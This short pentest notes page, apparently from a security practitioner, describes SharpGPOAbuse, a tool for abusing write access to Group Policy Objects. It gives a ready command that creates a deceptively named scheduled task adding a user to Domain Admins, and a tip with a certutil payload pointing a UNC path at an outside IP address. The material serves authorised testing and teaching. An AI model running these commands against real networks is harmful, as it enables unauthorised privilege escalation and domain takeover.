# SharpGPOabuse

An awesome tool for abusing "generic write" access to GPOs (which you might identify after running BloodHound). Here’s a sample syntax you could run:

SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD /DOMAIN" --GPOName "Name of GPO with Generic Write Access"

We talked about this tool in more detail on episode #441 of the 7 Minute Security podcast.

Tip

Unlike pygpoabuse, if you're running a payload like -command "certutil -syncwithwu \\10.1.2.3" you do not need to double escape the UNC path with backslashes. Just \\uncpath will work fine.